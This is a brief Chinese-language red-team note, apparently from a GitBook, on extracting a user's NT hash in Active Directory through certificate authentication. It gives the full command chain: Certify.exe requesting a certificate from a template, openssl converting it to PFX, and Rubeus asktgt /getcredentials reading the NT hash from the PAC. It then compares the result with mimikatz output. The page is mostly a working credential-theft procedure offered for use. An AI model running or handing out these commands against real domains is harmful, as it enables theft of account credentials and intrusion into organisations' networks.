# 通过证书检索NTHash

**使用证书请求票证**(需要应用程序策略为可以身份验证的)，并使用/getcredentials在PAC中检索NT哈希

* 申请证书

```
Certify.exe request /ca:dc.fbi.gov\fbi-DC-CA /template:NTHash
```

<figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2FLMPbUj1Z27YLwidgRQCk%2F1685871773187.png?alt=media&#x26;token=9a877bc8-fb4c-44b2-a128-9978911fffe1" alt=""><figcaption></figcaption></figure>

![](C:%5CUsers%5Cice%5CDesktop%5CRain1_lce%5C%E5%9B%BE%E7%89%87%5C1685871773187.png)

* 将含有公私钥的pem证书整个复制到kali中使用openssl进行格式转化

  ```
  /usr/bin/openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx 
  ```

  在这里输入密码

  <figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2FvccnrGYvZ1XGjj2FSuhA%2F1681730920678.png?alt=media&#x26;token=a91750bb-18c9-434c-ba98-d1e0b8174dcc" alt=""><figcaption></figcaption></figure>

  ![1681730920678](C:%5CUsers%5Cice%5CDesktop%5CRain1_lce%5C%E5%9B%BE%E7%89%87%5C1681730920678.png)
* ```
  Rubeus.exe asktgt /getcredentials /user:"test2" /certificate:"cert.pfx" /password:"123456" /domain:"fbi.gov" /dc:"dc.fbi.gov" /show
  # user是请求证书的用户，cert.pfx是刚刚在kali机器里转化得到的证书，密码是上面输入的密码
  ```

  <figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2FMAh9OEHX04W6sHgHSr49%2F1685870776093.jpg?alt=media&#x26;token=2518d722-3e41-44a1-82b9-ff2fbb43ea70" alt=""><figcaption></figcaption></figure>

  ![](C:%5CUsers%5Cice%5CDesktop%5CRain1_lce%5C%E5%9B%BE%E7%89%87%5C1685870776093.jpg)

  和mimikatz抓取得到的hash是一样的